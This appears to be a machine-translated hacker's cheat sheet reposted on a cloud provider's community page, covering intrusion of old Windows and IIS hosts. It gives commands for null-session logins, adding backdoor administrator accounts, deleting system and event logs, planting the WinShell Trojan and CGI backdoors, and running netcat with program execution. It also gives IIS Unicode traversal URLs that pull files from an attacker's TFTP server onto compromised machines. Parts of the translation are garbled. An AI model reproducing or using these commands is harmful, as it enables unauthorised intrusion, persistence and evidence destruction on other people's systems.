The administrator and the hacker must know the command
Common Few net commands:
(Establish an empty pipe connection with a remote host) net use \\IP address \ipc$ ""/use: ""
(log in as an administrator to the remote host) net use \\IP address \ipc$ "password"/use: "Administrator"
(Transfer files to remote host Winnt directory) copy native directory path \ Program \\IP address \admin$
(View remote host times) NET time \\IP address
(Timed to start a program) at \\IP address 02:18 Readme.exe
(view shared) net view \\IP address
(View NetBIOS Workgroup list) Nbtstat-a IP address
(Map remote host C disk to its own F disk) net use F: \\IP address \c$ ""/user: "Administrator"
(these two add themselves to the Administrators group): NET user username password/add
net localgroup Administrators user name/add
(disconnect) net use \\IP address \ipc$/delete
Outstanding
Del C:\winnt\system32\logfiles\*.*
Del c:\winnt\ssytem32\config\*.evt
Del C:\winnt\system32\dtclog\*.*
Del C:\winnt\system32\*.log
Del C:\winnt\system32\*.txt
Del C:\winnt\*.txt
Del C:\winnt\*.log
First, Netsvc.exe
The following commands list the time Tasks service for the service project on the host, the lookup, and the remote boot host:
Netsvc/list \\IP Address
NETSVC Schedule \\IP Address/query
Netsvc \\IP Address Schedule/start
Second, OpenTelnet.exe
Remotely boot the host's Telnet service and bind the port to 7878, for example:
Opentelnet \\IP Address user name password 1 7878
You can then telnet to the host's 7878 port and enter the DOS mode:
Telnet IP Address 7878
Third, Winshell.exe
A very small Trojan (less than 6K), telnet to the host 7878 port, enter the password WinShell, when you see cmd>, you can hit the following
's Command:
P Path (view path information for WinShell main program)
b reBoot (reboot machine)
D ShutDown (shutdown machine)
S Shell (you will see the lovely "c:\>" after execution)
X exit (Exit this logon session, this command does not terminate WinShell operation)
cmd> http://.../srv.exe (download files from other sites via HTTP to the machine running WinShell)
Four, 3389 Landers, GUI way to login to the remote host
Five, Elsave.exe
Event Log Cleanup Tool
Elsave-s \\IP Address-L "Application"-C
Elsave-s \\IP Address-L "system"-C
Elsave-s \\IP Address-L "security"-C
Successful cleanup of application log, System log, security log after execution
VI. Hbulot.exe
Open 3389 Services for Win2kserver and WinXP
Hbulot [/R]
Using/R indicates that the target is automatically reset after the installation is complete and the setting takes effect.
Vii. Nc.exe (Netcat.exe)
A good tool, some scripting programs have to use it, but also to do after the overflow of the connection.
Want to connect to somewhere: NC [-options] hostname port[s] [ports] ...
Bind port Wait for connection: nc-l-P Port [-options] [hostname] [port]
Parameters:
-e Prog program redirection, once connected, execute [Dangerous!!]
-G Gateway source-routing Hop Point[s], up to 8
-G num source-routing pointer:4, 8, 12, ...
-H Help Information
-I secs delay interval
-L listening mode for inbound connections
-n Specifies the IP address of the number and cannot be used with hostname
The-o file records 16-in-system transport
-P port Local port number
-R arbitrarily specify local and remote ports
-S addr Local Source Address
-U UDP mode
-v Verbose output-two-V for more detailed content
-W secs timeout time
-Z Turn off the input output-when used for scanning
Eight, TFTPD32. Exe
The computer temporarily into an FTP server, so that the broiler to download files, tftp command to execute on the broiler, usually to use
Unicode vulnerability or Telnet to a broiler, for example:
Http://IP address/s cripts/. %255c.. %255c/winnt/system32/cmd.exe?/c tftp-i Native IP address get file
Name c:\winnt\system32\ file name
You can then run the file directly:
Http://IP address/s cripts/. %255c.. %255c/winnt/system32/cmd.exe?/c+ file name
Ix. Prihack.exe is a printer remote buffer overflow tool for IIS. Idqover.exe is overflow idq, select "Overflow after a
Port listener, and then use Telnet to connect to its listening port, and if the overflow succeeds, the bound command executes immediately.
Xploit.exe is a graphical interface to the IDA overflow, after successful WinXP need to play WinXP.
10, Ntis.exe, Cmd.exe and cmdasp.asp are three cgi-backdoor,exe to be placed in the Cgi-bin directory, ASP put ASP
The directory where permissions are executed. Then use IE browser to connect.
One or one Xscan command line run parameter description:
In the detection process, press the "[space]" key to view the status of each thread and scan progress, press "Q" key to save the current data in advance exit the program,
-port: Detects the port status of a common service (can be determined by the "port-scan-options\port-list" item of the \dat\config.ini file)
System to be tested port list);
-FTP: Detects FTP weak password (can set username/password dictionary file by \dat\config.ini file);
-ntpass: Detect nt-server Weak password (can be set by \dat\config.ini file username/password dictionary file);
-CGI: Detects CGI vulnerabilities (the encoding scheme can be set through the "Cgi-encode\encode_type" item of the \dat\config.ini file);
-iis: Detects IIS vulnerabilities (the encoding scheme can be set through the "Cgi-encode\encode_type" item of the \dat\config.ini file);
The other options have the following meanings:
-V: Show detailed scan progress
-P: Skip a ping-not-pass host
-O: Skipping hosts with no open ports detected
-T < concurrent threads [, number of concurrent hosts]>: Specifies the maximum number of concurrent threads and the number of concurrent hosts, the default quantity is 100,10
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.